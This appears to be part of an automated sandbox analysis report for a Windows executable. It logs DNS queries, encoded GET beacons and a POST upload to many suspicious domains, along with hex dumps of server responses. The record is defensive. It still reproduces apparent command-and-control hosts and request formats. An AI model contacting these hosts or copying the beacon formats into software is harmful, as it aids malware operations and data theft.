                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\A2028041200SD.exeCode function: 0_2_00944EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00944EB5
                Source: global trafficHTTP traffic detected: GET /vluw/?prh4=Qny9vPKZpQxlYqiHBli6Dgd1W9OHStFoVbvPUumHvVgYiZzoUIcT00lHd/ClJ1QqOMs3sbdEqCPN2Gnhne5G8ybZX+Xf8gbOpuID/3YwCRTfrNHUUA==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.zkdamdjj.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /a4h7/?prh4=PP6GFaOQILwxi5dhMSrYmidfGUiluWiM7xDYUPH7LXca8g8uO5tY4GvA0apkUDdsINAyEZvfq9K0A+PIYqHQIltxcg2u/Ln1i4sz2BSy8/lHA9faVw==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.75178.clubConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /k6yn/?_VK8=7pXD8zQxGFxP&prh4=tNpa1p20+8HvGGTGCcJ0ltHXQ7hkDEI9aQgmgnvjgQBap2YCvQVXfu4lL5fLGicbWcSejDEnKeIqzsVAbPYV6QWKx4B669tBZ47n68xm5CBB0u297w== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.orbitoasis.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /cboa/?prh4=af1TSyH9ZKWDWOLime6W6+N8m41wPvg6MbDiaGUzr5LnkxoPx276h77cE37euV2f02htPG9gF0GAKqxhPgTdbhPG43TCObvDHb/CcXEoGnF55JIhuw==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.thaor56.onlineConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /0gis/?prh4=aMrcg/vn2G/nVrnfdsqttTKn7l5IpN7CuDhUOTj2ocWrQXkoPHFbln1FmLoTaWY74KRoWkXSZUSbj2dC1qWbZWPyRks4Yv4++AQZW9eiSbZnXCVOCA==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.earbudsstore.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /bwyw/?prh4=zeqgG3zf3rSD22A3/l1gTLGQ/sW8joOuTT/213oW5xKBpEmM0JRqJaaJcKUMxr+7Esc9obOTS2jlvNaYH8wfdJGRHCEAKXdxR5M68AEOT1S+b5dkfA==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.superiorfencing.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /2nga/?prh4=Q2EbwnYhq4vEVEYycJMqtdR4BlKtLPQlBliPtc8X0AIyDwowOCFGn/661E09vvaaF3LvgpjgW8Wvr6GWd63UJrhBCWi6xUDdTpqdehfcV6DO82Y8sA==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.beylikduzu616161.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /gxyh/?prh4=xivIugper8hSVuoN4YvDvis0ACu7xzkGnAUBMzrp/j5qvAoCvNj6F299r/oRQ/YEeKRSLhAnFUBxmqELIOT++SwIfOluLOgfprtVp+sbk1f1bmq9tA==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.zxyck.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /n9b0/?prh4=A8VrqyfvUbO/Hw2IDw0dtkQZ0NZDVPvZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd4udfcATptjj7os9tTYvN+mNNekq8bw==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.dailyfuns.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /1ag2/?prh4=4VB/N4F6tibqC9FTErplINOthlfgxvKF4YtEqiz3GsaSMOHPZtZI38ZqeQNXmBxLoc2gIm7YkXHcJ/CISLsxY8XxMzohQjeM2qyI6vORstQK1Dv1jg==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.mydreamdeal.clickConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficHTTP traffic detected: GET /dvmh/?prh4=oFIEYIO2gjvnF7Mvhq7sL0t2a9Wv2ONAMWbI9WLDgwNy2jujsZOasn0dsRYzh1BdbVLS+4ZlfSYhPFaSDYrrOj2l86R3Os3ZjQmQABGtMbl8YFkRqw==&_VK8=7pXD8zQxGFxP HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Host: www.maitreyatoys.worldConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like Gecko
                Source: global trafficDNS traffic detected: DNS query: www.zkdamdjj.shop
                Source: global trafficDNS traffic detected: DNS query: www.75178.club
                Source: global trafficDNS traffic detected: DNS query: www.orbitoasis.online
                Source: global trafficDNS traffic detected: DNS query: www.thaor56.online
                Source: global trafficDNS traffic detected: DNS query: www.earbudsstore.shop
                Source: global trafficDNS traffic detected: DNS query: www.superiorfencing.net
                Source: global trafficDNS traffic detected: DNS query: www.beylikduzu616161.xyz
                Source: global trafficDNS traffic detected: DNS query: www.zxyck.net
                Source: global trafficDNS traffic detected: DNS query: www.dailyfuns.info
                Source: global trafficDNS traffic detected: DNS query: www.mydreamdeal.click
                Source: global trafficDNS traffic detected: DNS query: www.maitreyatoys.world
                Source: global trafficDNS traffic detected: DNS query: www.dating-apps-az-dn5.xyz
                Source: unknownHTTP traffic detected: POST /a4h7/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Host: www.75178.clubOrigin: http://www.75178.clubCache-Control: no-cacheContent-Type: application/x-www-form-urlencodedContent-Length: 193Connection: closeReferer: http://www.75178.club/a4h7/User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 521) like GeckoData Raw: 70 72 68 34 3d 43 4e 53 6d 47 73 43 71 44 70 59 56 32 37 4e 53 4e 44 43 47 76 45 42 41 54 33 6d 56 72 6d 72 37 70 69 62 7a 53 2b 50 31 45 69 35 57 37 31 45 54 41 36 77 4c 6e 57 53 51 39 35 70 4a 57 54 4e 78 65 63 6c 30 46 34 2b 33 6e 2b 4b 34 41 4e 6a 64 50 38 6e 63 4c 48 42 61 56 53 6a 56 32 34 37 6f 72 36 67 6b 32 31 65 69 6c 65 56 50 4c 76 6a 45 4a 51 37 57 67 34 74 7a 37 52 42 48 74 76 34 53 49 34 4c 4a 4a 39 32 53 30 68 34 78 57 70 6e 30 65 4b 66 4d 34 64 6b 47 4d 4b 67 2f 75 6b 59 48 61 31 4f 4a 46 43 6f 75 4b 4e 75 70 78 6d 73 35 4b 6c 73 31 70 61 63 71 47 30 74 71 Data Ascii: prh4=CNSmGsCqDpYV27NSNDCGvEBAT3mVrmr7pibzS+P1Ei5W71ETA6wLnWSQ95pJWTNxecl0F4+3n+K4ANjdP8ncLHBaVSjV247or6gk21eileVPLvjEJQ7Wg4tz7RBHtv4SI4LJJ92S0h4xWpn0eKfM4dkGMKg/ukYHa1OJFCouKNupxms5Kls1pacqG0tq
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 08:23:26 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 2b f3 cb cc ea cc fa ed b7 df 1e ff 89 5d 32 6b 43 e1 06 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 4d e7 db 6f 97 9f 89 5b 99 60 46 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 16 a5 5b 3d d5 95 77 4f de 7d 4a c7 b4 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 2a 85 e9 27 e6 3f b2 82 eb f2 b0 70 cb ab 25 c8 3b ea a9 99 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 66 7c 5f da 66 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 90 b3 6a 30 cd ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 b6 32 e7 34 f8 fb 65 6a ff d9 37 0f 48 e7 de 33 93 30 3e 3d 0c a8 02 6c fb 65 20 b8 71 e3 56 a1 6d 7e 19 94 66 5a de 97 6e 11 7a 7f f9 71 59 19 9e dd 87 01 4a e4 dd fb c1 38 4c dd fb c0 0d fd a0 02 c3 5f 09 8c 1c 8e 51 02 9b bc 9f 65 99 76 e4 17 fd 19 80 8a e2 ac 78 18 fc b3 77 69 ef a7 bd 8e 61 53 1c c3 91 f7 63 b9 e9 38 61 ea 3f 0c 6e fa 13 b3 f0 c3 f4 5d f7 7f 7e 67 bf 74 ed 2a cc d2 2f e0 e8 59 e5 16 37 f2 70 c2 32 8f 4d 20 0b 2b ce ec e8 ff 60 bb af 3d fe 4c 20 91 db 9d 9e 99 bc 8f 5d 0f 48 c9 ac ab ec fd 66 2f c3 c5 b3 14 7f 1c 7f 3b fb 00 45 ae 35 f0 76 d2 af 00 91 79 96 96 ee 7d 98 7a d9 cd 41 5f e5 ca 5c da db de 57 cb cb ca ac ea 12 68 c7 71 6f 16 5f 50 f3 ac fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 53 c1 15 67 17 99 da d5 e5 5c 5f be 6b 16 9c b7 df eb be 77 14 37 1b be 9e 16 b9 b4 0f f9 ed b1 d4 03 03 18 de 07 e2 ba 42 6b e1 e6 ae 09 74 06 dc c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 26 38 45 50 ef a7 bd 8e 4d 2f ed 6d ec ea 94 b7 1c 99 9f 1c ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 94 c2 f4 cd 94 27 f8 27 40 bb d6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 ed b0 bd bc ae b0 84 8e ae 07 af 24 f1 8e fe ad 18 7a 75 df 3b ae 9d 15 66 af bf 87 01 70 29 6e d1 3b a1 f7 1b bd 4a 1c f8 23 9a b9 d2 c6 a7 fb 3c 04 59 e3 16 57 f8 7a cf c6 83 97 d9 75 f9 f9 b0 09 fc 4c 73 6b 39 af 4c 60 d4 88 98 8c de 18 bc 62 e2 73 14 bf fa b5 8f 14 f5 0b 62 ac e3 1b dd 7c b7 b4 30 bd f8 ec 0f 7c 5e 1c 96 d5 fd 25 ac f4 80 4f dd 41 56 57 65 08 1c 42 ff f1 c6 7e af c8 57 ee 6e 9c f1 77 78 5d f5 bf 9d 16 f0 14 87 37 6c 79 71 d6 db 57 ef 19 df ef 70 d1 b4 19 87 3e 50 b2 0d 6e 08 6e f1 36 fe 46 f2 eb 8d dd bc 80 fe a3 9d 2e 01 17 c4 a8 cf 7c 58 ef 08 ee c3 c4 f4 6f d5 f8 fd 50 9f fa de cb d2 fe 96 03 02 d4 ed f9 fa 98 db be c4 47 2b 8b 9d b7 53 f4 72 bc 3e e5 8f 32 68 b3 c2 b9 b7 00 46 22 10 a3 fa 3f f7 66 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 08:23:28 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 46 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 72 e3 48 72 fe 3f 4f 41 cb 61 7b 37 d0 6a 9c 24 41 ad d4 bb b8 08 80 24 40 00 24 48 82 0e c7 04 6e 80 38 89 9b dc f0 03 f9 35 fc 64 2e 50 52 8b 62 4b d3 bd 0e ff 70 cd 44 88 a8 23 2b 2b f3 cb cc ea cc fa ed b7 df 1e ff 89 5d 32 6b 43 e1 06 41 95 c4 df 7e 7b 7c fe 33 00 ed 31 70 4d e7 db 6f 97 9f 89 5b 99 60 46 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f bf 9e ee 2a b7 ab e0 9e c4 5f 06 76 60 16 a5 5b 3d d5 95 77 4f de 7d 4a c7 b4 03 f7 be 5f 5f 64 f1 15 a1 34 bb b7 fb a1 4f 17 2a 85 e9 27 e6 3f b2 82 eb f2 b0 70 cb ab 25 c8 3b ea a9 99 b8 4f 77 4d e8 b6 79 56 54 57 d3 da d0 a9 82 27 c7 6d 42 db bd bf 7c 7c 19 84 69 58 85 66 7c 5f da 66 ec 3e a1 5f bf 93 aa c2 2a 76 bf 11 08 31 90 b3 6a 30 cd ea d4 79 84 9f 3b 9f 45 59 56 a7 d8 1d f4 72 7b 11 97 5d 96 2f 7c f4 a2 b6 32 e7 34 f8 fb 65 6a ff d9 37 0f 48 e7 de 33 93 30 3e 3d 0c a8 02 6c fb 65 20 b8 71 e3 56 a1 6d 7e 19 94 66 5a de 97 6e 11 7a 7f f9 71 59 19 9e dd 87 01 4a e4 dd fb c1 38 4c dd fb c0 0d fd a0 02 c3 5f 09 8c 1c 8e 51 02 9b bc 9f 65 99 76 e4 17 fd 19 80 8a e2 ac 78 18 fc b3 77 69 ef a7 bd 8e 61 53 1c c3 91 f7 63 b9 e9 38 61 ea 3f 0c 6e fa 13 b3 f0 c3 f4 5d f7 7f 7e 67 bf 74 ed 2a cc d2 2f e0 e8 59 e5 16 37 f2 70 c2 32 8f 4d 20 0b 2b ce ec e8 ff 60 bb af 3d fe 4c 20 91 db 9d 9e 99 bc 8f 5d 0f 48 c9 ac ab ec fd 66 2f c3 c5 b3 14 7f 1c 7f 3b fb 00 45 ae 35 f0 76 d2 af 00 91 79 96 96 ee 7d 98 7a d9 cd 41 5f e5 ca 5c da db de 57 cb cb ca ac ea 12 68 c7 71 6f 16 5f 50 f3 ac fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 53 c1 15 67 17 99 da d5 e5 5c 5f be 6b 16 9c b7 df eb be 77 14 37 1b be 9e 16 b9 b4 0f f9 ed b1 d4 03 03 18 de 07 e2 ba 42 6b e1 e6 ae 09 74 06 dc c8 f3 cf 37 72 3d fb 57 33 5f 77 c5 26 38 45 50 ef a7 bd 8e 4d 2f ed 6d ec ea 94 b7 1c 99 9f 1c ea d7 49 dc 87 95 9b 94 37 64 be 23 09 03 38 fa c1 94 c2 f4 cd 94 27 f8 27 40 bb d6 c7 0d f5 17 1c 5b 59 55 65 c9 c3 a0 df e3 ed b0 bd bc ae b0 84 8e ae 07 af 24 f1 8e fe ad 18 7a 75 df 3b ae 9d 15 66 af bf 87 01 70 29 6e d1 3b a1 f7 1b bd 4a 1c f8 23 9a b9 d2 c6 a7 fb 3c 04 59 e3 16 57 f8 7a cf c6 83 97 d9 75 f9 f9 b0 09 fc 4c 73 6b 39 af 4c 60 d4 88 98 8c de 18 bc 62 e2 73 14 bf fa b5 8f 14 f5 0b 62 ac e3 1b dd 7c b7 b4 30 bd f8 ec 0f 7c 5e 1c 96 d5 fd 25 ac f4 80 4f dd 41 56 57 65 08 1c 42 ff f1 c6 7e af c8 57 ee 6e 9c f1 77 78 5d f5 bf 9d 16 f0 14 87 37 6c 79 71 d6 db 57 ef 19 df ef 70 d1 b4 19 87 3e 50 b2 0d 6e 08 6e f1 36 fe 46 f2 eb 8d dd bc 80 fe a3 9d 2e 01 17 c4 a8 cf 7c 58 ef 08 ee c3 c4 f4 6f d5 f8 fd 50 9f fa de cb d2 fe 96 03 02 d4 ed f9 fa 98 db be c4 47 2b 8b 9d b7 53 f4 72 bc 3e e5 8f 32 68 b3 c2 b9 b7 00 46 22 10 a3 fa 3f f7 66 1c bf 27 f0 4b a7 02 41 1d 80 7b 00 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Wed, 20 Nov 2024 08:23:31 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 35 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de 0f c6 61 ea de 07 6e e8 07 15 18 fe 4a 60 e4 70 8c 12 d8 e4 fd 2c cb b4 23 bf e8 cf 00 54 14 67 c5 c3 e0 9f bd 4b 7b 3f ed 75 0c 9b e2 18 8e bc 1f cb 4d c7 09 53 ff 61 70 d3 9f 98 85 1f a6 ef ba ff f3 3b fb a5 6b 57 61 96 7e 01 47 cf 2a b7 b8 91 87 13 96 79 6c 02 59 58 71 66 47 ff 07 db 7d ed f1 67 02 89 dc ee f4 cc e4 7d ec 7a 40 4a 66 5d 65 ef 37 7b 19 2e 9e a5 f8 e3 f8 db d9 07 28 72 ad 81 b7 93 7e 05 88 cc b3 b4 74 ef c3 d4 cb 6e 0e fa 2a 57 e6 d2 de f6 be 5a 5e 56 66 55 97 40 3b 8e 7b b3 f8 82 9a 67 f5 0f 11 e4 5f fe 68 75 e1 9a 65 96 7e be 1e 1b 5e af ef 21 f9 99 0a ae 38 bb c8 d4 ae 2e e7 fa f2 5d b3 e0 bc fd 5e f7 bd a3 b8 d9 f0 f5 b4 c8 a5 7d c8 6f 8f a5 1e 18 c0 f0 3e 10 d7 15 5a 0b 37 77 4d a0 33 e0 46 9e 7f be 91 eb d9 bf 9a f9 ba 2b 36 c1 29 82 7a 3f ed 75 6c 7a 69 6f 63 57 a7 bc e5 c8 fc e4 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f a6 14 a6 6f a6 3c c1 3f 01 da b5 3e 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f 87 ed e5 75 85 25 74 74 3d 78 25 89 77 f4 6f c5 d0 ab fb de 71 ed ac 30 7b fd 3d 0c 80 4b 71 8b de 09 bd df e8 55 e2 c0 1f d1 cc 95 36 3e dd e7 21 c8 1a b7 b8 c2 d7 7b 36 1e bc cc ae cb cf 87 4d e0 67 9a 5b cb 79 65 02 a3 46 c4 64 f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 cd 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 a6 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e 5a 59 ec bc 9d a2 97 e3 f5 29 7f 94 41 9b 15 ce bd 05 30 12 81 18 d5 ff b9 37 e3 f8 3d 81 5f 3a 15 08 ea 00 dc 03 20 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Wed, 20 Nov 2024 08:23:34 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 34 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
